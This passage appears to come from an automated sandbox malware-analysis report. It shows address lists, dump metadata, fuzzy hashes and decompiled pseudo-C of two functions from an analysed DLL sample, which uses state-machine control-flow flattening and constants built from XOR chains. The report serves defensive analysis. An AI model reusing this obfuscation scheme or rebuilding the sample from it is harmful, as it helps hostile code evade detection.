                                                                                                                                                                            0x02f6bf5f
                                                                                                                                                                            0x02f6bf63
                                                                                                                                                                            0x02f6bf66
                                                                                                                                                                            0x02f6bf69
                                                                                                                                                                            0x02f6bf6d
                                                                                                                                                                            0x02f6bf70
                                                                                                                                                                            0x02f6bf77
                                                                                                                                                                            0x02f6bf7a
                                                                                                                                                                            0x02f6bf81
                                                                                                                                                                            0x02f6bf88
                                                                                                                                                                            0x02f6bf8c
                                                                                                                                                                            0x02f6bf93
                                                                                                                                                                            0x02f6bf9a
                                                                                                                                                                            0x02f6bfa1
                                                                                                                                                                            0x02f6bfa8
                                                                                                                                                                            0x02f6bfaf
                                                                                                                                                                            0x02f6bfb3
                                                                                                                                                                            0x02f6bfba
                                                                                                                                                                            0x02f6bfc1
                                                                                                                                                                            0x02f6bfc8
                                                                                                                                                                            0x02f6bfcf
                                                                                                                                                                            0x02f6bfd6
                                                                                                                                                                            0x02f6bfda
                                                                                                                                                                            0x02f6bfde
                                                                                                                                                                            0x02f6bfe2
                                                                                                                                                                            0x02f6bfe9
                                                                                                                                                                            0x02f6bff3
                                                                                                                                                                            0x02f6bff8
                                                                                                                                                                            0x02f6bffd
                                                                                                                                                                            0x02f6c004
                                                                                                                                                                            0x02f6c00b
                                                                                                                                                                            0x02f6c012
                                                                                                                                                                            0x02f6c019
                                                                                                                                                                            0x02f6c020
                                                                                                                                                                            0x02f6c027
                                                                                                                                                                            0x02f6c02e
                                                                                                                                                                            0x02f6c039
                                                                                                                                                                            0x02f6c03a
                                                                                                                                                                            0x02f6c03d
                                                                                                                                                                            0x02f6c044
                                                                                                                                                                            0x02f6c04b
                                                                                                                                                                            0x02f6c052
                                                                                                                                                                            0x02f6c059
                                                                                                                                                                            0x02f6c060
                                                                                                                                                                            0x02f6c067
                                                                                                                                                                            0x02f6c06e
                                                                                                                                                                            0x02f6c072
                                                                                                                                                                            0x02f6c079
                                                                                                                                                                            0x02f6c080
                                                                                                                                                                            0x02f6c08c
                                                                                                                                                                            0x02f6c08f
                                                                                                                                                                            0x02f6c096
                                                                                                                                                                            0x02f6c09f
                                                                                                                                                                            0x02f6c0a6
                                                                                                                                                                            0x02f6c0ad
                                                                                                                                                                            0x02f6c0b9
                                                                                                                                                                            0x02f6c0be
                                                                                                                                                                            0x02f6c0c6
                                                                                                                                                                            0x02f6c0cb
                                                                                                                                                                            0x02f6c0d4
                                                                                                                                                                            0x02f6c0d7
                                                                                                                                                                            0x02f6c0da
                                                                                                                                                                            0x02f6c0e1
                                                                                                                                                                            0x02f6c0ec
                                                                                                                                                                            0x02f6c0ef
                                                                                                                                                                            0x02f6c0f6
                                                                                                                                                                            0x02f6c0fd
                                                                                                                                                                            0x02f6c104
                                                                                                                                                                            0x02f6c10b
                                                                                                                                                                            0x02f6c112
                                                                                                                                                                            0x02f6c119
                                                                                                                                                                            0x02f6c120
                                                                                                                                                                            0x02f6c12e
                                                                                                                                                                            0x02f6c134
                                                                                                                                                                            0x02f6c139
                                                                                                                                                                            0x02f6c13e
                                                                                                                                                                            0x02f6c145
                                                                                                                                                                            0x02f6c14c
                                                                                                                                                                            0x02f6c153
                                                                                                                                                                            0x02f6c157
                                                                                                                                                                            0x02f6c15e
                                                                                                                                                                            0x02f6c165
                                                                                                                                                                            0x02f6c169
                                                                                                                                                                            0x02f6c170
                                                                                                                                                                            0x02f6c17a
                                                                                                                                                                            0x02f6c17d
                                                                                                                                                                            0x02f6c180
                                                                                                                                                                            0x02f6c18d
                                                                                                                                                                            0x02f6c19c
                                                                                                                                                                            0x02f6c1ad
                                                                                                                                                                            0x02f6c1b3
                                                                                                                                                                            0x02f6c1bb
                                                                                                                                                                            0x02f6c1bd
                                                                                                                                                                            0x02f6c1c0
                                                                                                                                                                            0x02f6c1c8
                                                                                                                                                                            0x02f6c1cb
                                                                                                                                                                            0x02f6c1fa
                                                                                                                                                                            0x02f6c20d
                                                                                                                                                                            0x02f6c224
                                                                                                                                                                            0x02f6c22c
                                                                                                                                                                            0x02f6c234

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcmpi
                                                                                                                                                                            • String ID: '$8~"$$w%
                                                                                                                                                                            • API String ID: 1586166983-1780403920
                                                                                                                                                                            • Opcode ID: b943e74ed83993c7e658aecd3645c91633508a1058f639a819ef4eaa52b4017d
                                                                                                                                                                            • Instruction ID: 4672668f366dda257266f8aad732a55350f716349ce7f403865e1ab877563ac2
                                                                                                                                                                            • Opcode Fuzzy Hash: b943e74ed83993c7e658aecd3645c91633508a1058f639a819ef4eaa52b4017d
                                                                                                                                                                            • Instruction Fuzzy Hash: 16A11171D01209EBDF18CFE5E98A9EEBBB2FF44314F208119E511BA264D7B41A5ACF50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                            			E02F6D8DB(signed int __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                            				char _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				unsigned int _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				unsigned int _v88;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                            				signed int _v100;
                                                                                                                                                                            				signed int _v104;
                                                                                                                                                                            				signed int _v108;
                                                                                                                                                                            				signed int _v112;
                                                                                                                                                                            				signed int _v116;
                                                                                                                                                                            				void* _t128;
                                                                                                                                                                            				signed int _t142;
                                                                                                                                                                            				signed int _t153;
                                                                                                                                                                            				signed int _t155;
                                                                                                                                                                            				signed int* _t163;
                                                                                                                                                                            				void* _t164;
                                                                                                                                                                            				signed int* _t167;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_t163 = __edx;
                                                                                                                                                                            				_t153 = __ecx;
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t128);
                                                                                                                                                                            				_v104 = 0xcf676c;
                                                                                                                                                                            				_t167 =  &(( &_v116)[4]);
                                                                                                                                                                            				_v104 = _v104 + 0xb3f2;
                                                                                                                                                                            				_v104 = _v104 | 0x988d6f24;
                                                                                                                                                                            				_t164 = 0x3ef4407;
                                                                                                                                                                            				_v104 = _v104 << 0xf;
                                                                                                                                                                            				_v104 = _v104 ^ 0xbfbf0000;
                                                                                                                                                                            				_v68 = 0xc42241;
                                                                                                                                                                            				_v68 = _v68 + 0x399a;
                                                                                                                                                                            				_v68 = _v68 ^ 0x00ce5291;
                                                                                                                                                                            				_v88 = 0x75dd03;
                                                                                                                                                                            				_v88 = _v88 + 0x7dba;
                                                                                                                                                                            				_v88 = _v88 >> 6;
                                                                                                                                                                            				_v88 = _v88 ^ 0x0008d458;
                                                                                                                                                                            				_v72 = 0x2f46be;
                                                                                                                                                                            				_v72 = _v72 + 0xffffdb55;
                                                                                                                                                                            				_v72 = _v72 ^ 0x002db90e;
                                                                                                                                                                            				_v76 = 0x23e806;
                                                                                                                                                                            				_v76 = _v76 >> 0x10;
                                                                                                                                                                            				_v76 = _v76 ^ 0x000f8af6;
                                                                                                                                                                            				_v116 = 0x607e6d;
                                                                                                                                                                            				_v116 = _v116 << 0x10;
                                                                                                                                                                            				_v116 = _v116 + 0xffff6686;
                                                                                                                                                                            				_v116 = _v116 | 0x3d181bb2;
                                                                                                                                                                            				_v116 = _v116 ^ 0x7f71bdaf;
                                                                                                                                                                            				_v96 = 0x2cc21a;
                                                                                                                                                                            				_v96 = _v96 | 0xe9438a5f;
                                                                                                                                                                            				_t155 = 0x3a;
                                                                                                                                                                            				_v96 = _v96 * 0x13;
                                                                                                                                                                            				_v96 = _v96 ^ 0x5347ec85;
                                                                                                                                                                            				_v108 = 0xb3af1a;
                                                                                                                                                                            				_v108 = _v108 / _t155;
                                                                                                                                                                            				_v108 = _v108 + 0x8361;
                                                                                                                                                                            				_v108 = _v108 | 0x789ced77;
                                                                                                                                                                            				_v108 = _v108 ^ 0x789572df;
                                                                                                                                                                            				_v92 = 0x2d2920;
                                                                                                                                                                            				_v92 = _v92 * 0x2c;
                                                                                                                                                                            				_v92 = _v92 * 0x1e;
                                                                                                                                                                            				_v92 = _v92 ^ 0xe8dd3266;
                                                                                                                                                                            				_v80 = 0xc07fec;
                                                                                                                                                                            				_v80 = _v80 << 9;
                                                                                                                                                                            				_v80 = _v80 ^ 0x80fbd8c8;
                                                                                                                                                                            				_v112 = 0xa84277;
                                                                                                                                                                            				_v112 = _v112 + 0xffffed27;
                                                                                                                                                                            				_v112 = _v112 * 0x1b;
                                                                                                                                                                            				_v112 = _v112 * 0x2c;
                                                                                                                                                                            				_v112 = _v112 ^ 0x0c742dd9;
                                                                                                                                                                            				_v64 = 0x297b8a;
                                                                                                                                                                            				_v64 = _v64 >> 0xf;
                                                                                                                                                                            				_v64 = _v64 ^ 0x0005dd25;
                                                                                                                                                                            				_v84 = 0x5c8db2;
                                                                                                                                                                            				_v84 = _v84 + 0x6b9b;
                                                                                                                                                                            				_v84 = _v84 + 0x3228;
                                                                                                                                                                            				_v84 = _v84 ^ 0x0059c37f;
                                                                                                                                                                            				_v100 = 0xb4d8ec;
                                                                                                                                                                            				_v100 = _v100 << 1;
                                                                                                                                                                            				_v100 = _v100 + 0xe9ba;
                                                                                                                                                                            				_v100 = _v100 | 0x2516dceb;
                                                                                                                                                                            				_v100 = _v100 ^ 0x257d75fc;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t164 != 0x3ef4407) {
                                                                                                                                                                            						if(_t164 == 0x3f5e611) {
                                                                                                                                                                            							_push(_t155);
                                                                                                                                                                            							_push(_t155);
                                                                                                                                                                            							_t142 = E02F5C5D8(_t163[1]);
                                                                                                                                                                            							_t167 =  &(_t167[3]);
                                                                                                                                                                            							 *_t163 = _t142;
                                                                                                                                                                            							__eflags = _t142;
                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                            								_t164 = 0xddf020d;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t164 == 0x4994ece) {
                                                                                                                                                                            								E02F6CAD5(_v64, _v84, __eflags, _v100, _t153 + 4,  &_v60);
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t164 == 0x4a51775) {
                                                                                                                                                                            									_t155 = _t153;
                                                                                                                                                                            									_t163[1] = E02F66187(_t155);
                                                                                                                                                                            									_t164 = 0x3f5e611;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									if(_t164 == 0x9d156cc) {
                                                                                                                                                                            										_t155 = _v108;
                                                                                                                                                                            										E02F60A90(_t155, _v92, _v80,  &_v60, _v112,  *_t153);
                                                                                                                                                                            										_t167 =  &(_t167[4]);
                                                                                                                                                                            										_t164 = 0x4994ece;
                                                                                                                                                                            										continue;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										if(_t164 != 0xddf020d) {
                                                                                                                                                                            											goto L13;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											_t155 = _t163;
                                                                                                                                                                            											E02F522A6(_t155, _v116,  &_v60, _v96);
                                                                                                                                                                            											_t167 =  &(_t167[2]);
                                                                                                                                                                            											_t164 = 0x9d156cc;
                                                                                                                                                                            											continue;
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						L16:
                                                                                                                                                                            						__eflags =  *_t163;
                                                                                                                                                                            						_t127 =  *_t163 != 0;
                                                                                                                                                                            						__eflags = _t127;
                                                                                                                                                                            						return 0 | _t127;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t164 = 0x4a51775;
                                                                                                                                                                            					 *_t163 =  *_t163 & 0x00000000;
                                                                                                                                                                            					__eflags =  *_t163;
                                                                                                                                                                            					_t163[1] = _v104;
                                                                                                                                                                            					L13:
                                                                                                                                                                            					__eflags = _t164 - 0xae42d9c;
                                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                                            				goto L16;
                                                                                                                                                                            			}

























                                                                                                                                                                            0x02f6d8e2
                                                                                                                                                                            0x02f6d8e9
                                                                                                                                                                            0x02f6d8eb
                                                                                                                                                                            0x02f6d8ed
                                                                                                                                                                            0x02f6d8f4
                                                                                                                                                                            0x02f6d8f5
                                                                                                                                                                            0x02f6d8f6
                                                                                                                                                                            0x02f6d8fb
                                                                                                                                                                            0x02f6d903
                                                                                                                                                                            0x02f6d906
                                                                                                                                                                            0x02f6d910
                                                                                                                                                                            0x02f6d918
                                                                                                                                                                            0x02f6d91d
                                                                                                                                                                            0x02f6d927
                                                                                                                                                                            0x02f6d92f
                                                                                                                                                                            0x02f6d937
                                                                                                                                                                            0x02f6d93f
                                                                                                                                                                            0x02f6d947
                                                                                                                                                                            0x02f6d94f
                                                                                                                                                                            0x02f6d957
                                                                                                                                                                            0x02f6d95c
                                                                                                                                                                            0x02f6d964
                                                                                                                                                                            0x02f6d96c
                                                                                                                                                                            0x02f6d974
                                                                                                                                                                            0x02f6d97c
                                                                                                                                                                            0x02f6d984
                                                                                                                                                                            0x02f6d989
                                                                                                                                                                            0x02f6d991
                                                                                                                                                                            0x02f6d999
                                                                                                                                                                            0x02f6d99e
                                                                                                                                                                            0x02f6d9a6
                                                                                                                                                                            0x02f6d9ae
                                                                                                                                                                            0x02f6d9b6
                                                                                                                                                                            0x02f6d9be
                                                                                                                                                                            0x02f6d9cd
                                                                                                                                                                            0x02f6d9ce
                                                                                                                                                                            0x02f6d9d2
                                                                                                                                                                            0x02f6d9da
                                                                                                                                                                            0x02f6d9e8
                                                                                                                                                                            0x02f6d9ec
                                                                                                                                                                            0x02f6d9f4
                                                                                                                                                                            0x02f6d9fc
                                                                                                                                                                            0x02f6da04
                                                                                                                                                                            0x02f6da11
                                                                                                                                                                            0x02f6da1a
                                                                                                                                                                            0x02f6da1e
                                                                                                                                                                            0x02f6da26
                                                                                                                                                                            0x02f6da2e
                                                                                                                                                                            0x02f6da33
                                                                                                                                                                            0x02f6da3b
                                                                                                                                                                            0x02f6da43
                                                                                                                                                                            0x02f6da50
                                                                                                                                                                            0x02f6da59
                                                                                                                                                                            0x02f6da5d
                                                                                                                                                                            0x02f6da65
                                                                                                                                                                            0x02f6da6d
                                                                                                                                                                            0x02f6da72
                                                                                                                                                                            0x02f6da7a
                                                                                                                                                                            0x02f6da82
                                                                                                                                                                            0x02f6da8a
                                                                                                                                                                            0x02f6da92
                                                                                                                                                                            0x02f6da9a
                                                                                                                                                                            0x02f6daa2
                                                                                                                                                                            0x02f6daa6
                                                                                                                                                                            0x02f6daae
                                                                                                                                                                            0x02f6dab6
                                                                                                                                                                            0x02f6dabe
                                                                                                                                                                            0x02f6dabe
                                                                                                                                                                            0x02f6dad0
                                                                                                                                                                            0x02f6db5e
                                                                                                                                                                            0x02f6db5f
                                                                                                                                                                            0x02f6db63
                                                                                                                                                                            0x02f6db68
                                                                                                                                                                            0x02f6db6b
                                                                                                                                                                            0x02f6db6d
                                                                                                                                                                            0x02f6db6f
                                                                                                                                                                            0x02f6db71
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6db71
                                                                                                                                                                            0x02f6dad2
                                                                                                                                                                            0x02f6dad8
                                                                                                                                                                            0x02f6dbaa
                                                                                                                                                                            0x02f6dade
                                                                                                                                                                            0x02f6dae4
                                                                                                                                                                            0x02f6db3a
                                                                                                                                                                            0x02f6db41
                                                                                                                                                                            0x02f6db44
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6dae6
                                                                                                                                                                            0x02f6daec
                                                                                                                                                                            0x02f6db27
                                                                                                                                                                            0x02f6db2b
                                                                                                                                                                            0x02f6db30
                                                                                                                                                                            0x02f6db33
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6daee
                                                                                                                                                                            0x02f6daf0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6daf6
                                                                                                                                                                            0x02f6db03
                                                                                                                                                                            0x02f6db05
                                                                                                                                                                            0x02f6db0a
                                                                                                                                                                            0x02f6db0d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6db0d
                                                                                                                                                                            0x02f6daf0
                                                                                                                                                                            0x02f6daec
                                                                                                                                                                            0x02f6dae4
                                                                                                                                                                            0x02f6dad8
                                                                                                                                                                            0x02f6dbb2
                                                                                                                                                                            0x02f6dbb4
                                                                                                                                                                            0x02f6dbb9
                                                                                                                                                                            0x02f6dbb9
                                                                                                                                                                            0x02f6dbc0
                                                                                                                                                                            0x02f6dbc0
                                                                                                                                                                            0x02f6db7c
                                                                                                                                                                            0x02f6db81
                                                                                                                                                                            0x02f6db81
                                                                                                                                                                            0x02f6db84
                                                                                                                                                                            0x02f6db87
                                                                                                                                                                            0x02f6db87
                                                                                                                                                                            0x02f6db87
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: )-$(2$m~`
                                                                                                                                                                            • API String ID: 0-2018184401
                                                                                                                                                                            • Opcode ID: 3e11803ea927e7df6680295804b9090ad11ac98bc0e337558a280692f26d1627
                                                                                                                                                                            • Instruction ID: 32161dd1833bcb4a4707321ddd5e6b00823b311e1af7f822ce42f2828a9227f6
                                                                                                                                                                            • Opcode Fuzzy Hash: 3e11803ea927e7df6680295804b9090ad11ac98bc0e337558a280692f26d1627
                                                                                                                                                                            • Instruction Fuzzy Hash: DB7146B29093429FC354DF25D58945BBBF0FB88398F004A1DF59696224E3B1DA49CF83
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                            			E02F69774(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                                            				char _v4;
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				void* _t119;
                                                                                                                                                                            				intOrPtr _t132;
                                                                                                                                                                            				void* _t134;
                                                                                                                                                                            				void* _t139;
                                                                                                                                                                            				signed int _t154;
                                                                                                                                                                            				signed int _t155;
                                                                                                                                                                            				signed int _t156;
                                                                                                                                                                            				void* _t158;
                                                                                                                                                                            				signed int* _t161;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a24);
                                                                                                                                                                            				_push(_a20);
                                                                                                                                                                            				_push(1);
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_push(1);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t119);
                                                                                                                                                                            				_v16 = 0xc48506;
                                                                                                                                                                            				_t161 =  &(( &_v52)[8]);
                                                                                                                                                                            				_v16 = _v16 + 0xffffac5b;
                                                                                                                                                                            				_v16 = _v16 ^ 0x00c0af73;
                                                                                                                                                                            				_t158 = 0;
                                                                                                                                                                            				_v36 = 0x37ec46;
                                                                                                                                                                            				_t139 = 0x2fa1272;
                                                                                                                                                                            				_t11 =  &_v36; // 0x37ec46
                                                                                                                                                                            				_t154 = 0xf;
                                                                                                                                                                            				_v36 =  *_t11 / _t154;
                                                                                                                                                                            				_t155 = 0x17;
                                                                                                                                                                            				_v36 = _v36 * 0x4d;
                                                                                                                                                                            				_v36 = _v36 ^ 0x011f94eb;
                                                                                                                                                                            				_v48 = 0x1c9307;
                                                                                                                                                                            				_v48 = _v48 + 0xffff180a;
                                                                                                                                                                            				_v48 = _v48 >> 0xc;
                                                                                                                                                                            				_v48 = _v48 + 0x45e7;
                                                                                                                                                                            				_v48 = _v48 ^ 0x000c030c;
                                                                                                                                                                            				_v20 = 0x2c1c35;
                                                                                                                                                                            				_v20 = _v20 * 0x1a;
                                                                                                                                                                            				_v20 = _v20 ^ 0x04724ae3;
                                                                                                                                                                            				_v52 = 0xfea2f7;
                                                                                                                                                                            				_v52 = _v52 + 0xffffcd03;
                                                                                                                                                                            				_v52 = _v52 << 0xf;
                                                                                                                                                                            				_v52 = _v52 >> 4;
                                                                                                                                                                            				_v52 = _v52 ^ 0x0374764b;
                                                                                                                                                                            				_v24 = 0x4bca1;
                                                                                                                                                                            				_v24 = _v24 + 0xffff92f8;
                                                                                                                                                                            				_v24 = _v24 >> 6;
                                                                                                                                                                            				_v24 = _v24 ^ 0x0004173d;
                                                                                                                                                                            				_v28 = 0xca25f8;
                                                                                                                                                                            				_v28 = _v28 ^ 0xf07fe4f1;
                                                                                                                                                                            				_v28 = _v28 | 0xda5170b9;
                                                                                                                                                                            				_v28 = _v28 ^ 0xfaf3c539;
                                                                                                                                                                            				_v40 = 0x557f86;
                                                                                                                                                                            				_v40 = _v40 / _t155;
                                                                                                                                                                            				_v40 = _v40 | 0x36ce95b0;
                                                                                                                                                                            				_v40 = _v40 + 0xffff3f34;
                                                                                                                                                                            				_v40 = _v40 ^ 0x36c02d15;
                                                                                                                                                                            				_v44 = 0x3d6d99;
                                                                                                                                                                            				_t156 = 0x16;
                                                                                                                                                                            				_v44 = _v44 * 0x7d;
                                                                                                                                                                            				_v44 = _v44 >> 0xc;
                                                                                                                                                                            				_v44 = _v44 << 0xd;
                                                                                                                                                                            				_v44 = _v44 ^ 0x3bf21f86;
                                                                                                                                                                            				_v32 = 0x4fb69d;
                                                                                                                                                                            				_v32 = _v32 << 4;
                                                                                                                                                                            				_v32 = _v32 / _t156;
                                                                                                                                                                            				_v32 = _v32 ^ 0x00344331;
                                                                                                                                                                            				_v8 = 0x9d9959;
                                                                                                                                                                            				_v8 = _v8 >> 0xe;
                                                                                                                                                                            				_v8 = _v8 ^ 0x000ae1f8;
                                                                                                                                                                            				_v12 = 0x98829;
                                                                                                                                                                            				_v12 = _v12 ^ 0xb9c9dda7;
                                                                                                                                                                            				_v12 = _v12 ^ 0xb9cd803a;
                                                                                                                                                                            				_t157 = _v4;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t139 != 0x2fa1272) {
                                                                                                                                                                            						if(_t139 == 0x306b7e5) {
                                                                                                                                                                            							E02F5F9C1(_v4, _v24, _v28, _v40, 1, _a24, 1, _a20, _t139, _v44, _v32);
                                                                                                                                                                            							_t161 =  &(_t161[9]);
                                                                                                                                                                            							_t139 = 0xc6d7030;
                                                                                                                                                                            							_t158 =  !=  ? 1 : _t158;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t139 == 0x66d181a) {
                                                                                                                                                                            								_t132 = E02F6BC6B();
                                                                                                                                                                            								_t157 = _t132;
                                                                                                                                                                            								if(_t132 != 0xffffffff) {
                                                                                                                                                                            									_t139 = 0xc4ce558;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t139 == 0xc4ce558) {
                                                                                                                                                                            									_t134 = E02F572C4(_v36,  &_v4, _v48, _v20, _t157, _v52);
                                                                                                                                                                            									_t161 =  &(_t161[4]);
                                                                                                                                                                            									if(_t134 != 0) {
                                                                                                                                                                            										_t139 = 0x306b7e5;
                                                                                                                                                                            										continue;
                                                                                                                                                                            									}
                                                                                                                                                                            								} else {
                                                                                                                                                                            									if(_t139 != 0xc6d7030) {
                                                                                                                                                                            										goto L14;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										E02F71538(_v8, _v12, _v4);
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						L7:
                                                                                                                                                                            						return _t158;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t139 = 0x66d181a;
                                                                                                                                                                            					L14:
                                                                                                                                                                            				} while (_t139 != 0xa576bfc);
                                                                                                                                                                            				goto L7;
                                                                                                                                                                            			}

























                                                                                                                                                                            0x02f6977b
                                                                                                                                                                            0x02f69781
                                                                                                                                                                            0x02f69786
                                                                                                                                                                            0x02f69787
                                                                                                                                                                            0x02f6978b
                                                                                                                                                                            0x02f6978c
                                                                                                                                                                            0x02f69790
                                                                                                                                                                            0x02f69791
                                                                                                                                                                            0x02f69792
                                                                                                                                                                            0x02f69797
                                                                                                                                                                            0x02f6979f
                                                                                                                                                                            0x02f697a2
                                                                                                                                                                            0x02f697ac
                                                                                                                                                                            0x02f697b4
                                                                                                                                                                            0x02f697b6
                                                                                                                                                                            0x02f697be
                                                                                                                                                                            0x02f697c3
                                                                                                                                                                            0x02f697c9
                                                                                                                                                                            0x02f697ce
                                                                                                                                                                            0x02f697d9
                                                                                                                                                                            0x02f697dc
                                                                                                                                                                            0x02f697e0
                                                                                                                                                                            0x02f697e8
                                                                                                                                                                            0x02f697f0
                                                                                                                                                                            0x02f697f8
                                                                                                                                                                            0x02f697fd
                                                                                                                                                                            0x02f69805
                                                                                                                                                                            0x02f6980d
                                                                                                                                                                            0x02f6981a
                                                                                                                                                                            0x02f6981e
                                                                                                                                                                            0x02f69826
                                                                                                                                                                            0x02f6982e
                                                                                                                                                                            0x02f69836
                                                                                                                                                                            0x02f6983b
                                                                                                                                                                            0x02f69840
                                                                                                                                                                            0x02f69848
                                                                                                                                                                            0x02f69850
                                                                                                                                                                            0x02f69858
                                                                                                                                                                            0x02f6985d
                                                                                                                                                                            0x02f69865
                                                                                                                                                                            0x02f6986d
                                                                                                                                                                            0x02f69875
                                                                                                                                                                            0x02f6987d
                                                                                                                                                                            0x02f69885
                                                                                                                                                                            0x02f69895
                                                                                                                                                                            0x02f69899
                                                                                                                                                                            0x02f698a1
                                                                                                                                                                            0x02f698a9
                                                                                                                                                                            0x02f698b1
                                                                                                                                                                            0x02f698be
                                                                                                                                                                            0x02f698bf
                                                                                                                                                                            0x02f698c3
                                                                                                                                                                            0x02f698c8
                                                                                                                                                                            0x02f698cd
                                                                                                                                                                            0x02f698d5
                                                                                                                                                                            0x02f698dd
                                                                                                                                                                            0x02f698e8
                                                                                                                                                                            0x02f698ec
                                                                                                                                                                            0x02f698f4
                                                                                                                                                                            0x02f698fc
                                                                                                                                                                            0x02f69901
                                                                                                                                                                            0x02f69909
                                                                                                                                                                            0x02f69916
                                                                                                                                                                            0x02f6991e
                                                                                                                                                                            0x02f69926
                                                                                                                                                                            0x02f6992a
                                                                                                                                                                            0x02f6992a
                                                                                                                                                                            0x02f69938
                                                                                                                                                                            0x02f699d4
                                                                                                                                                                            0x02f699d9
                                                                                                                                                                            0x02f699dc
                                                                                                                                                                            0x02f699e3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6993a
                                                                                                                                                                            0x02f69940
                                                                                                                                                                            0x02f6999b
                                                                                                                                                                            0x02f699a0
                                                                                                                                                                            0x02f699a5
                                                                                                                                                                            0x02f699a7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f699a7
                                                                                                                                                                            0x02f69942
                                                                                                                                                                            0x02f69948
                                                                                                                                                                            0x02f69987
                                                                                                                                                                            0x02f6998c
                                                                                                                                                                            0x02f69991
                                                                                                                                                                            0x02f69993
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f69993
                                                                                                                                                                            0x02f6994a
                                                                                                                                                                            0x02f69950
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f69956
                                                                                                                                                                            0x02f69962
                                                                                                                                                                            0x02f69967
                                                                                                                                                                            0x02f69950
                                                                                                                                                                            0x02f69948
                                                                                                                                                                            0x02f69940
                                                                                                                                                                            0x02f69969
                                                                                                                                                                            0x02f69971
                                                                                                                                                                            0x02f69971
                                                                                                                                                                            0x02f699eb
                                                                                                                                                                            0x02f699f0
                                                                                                                                                                            0x02f699f0
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
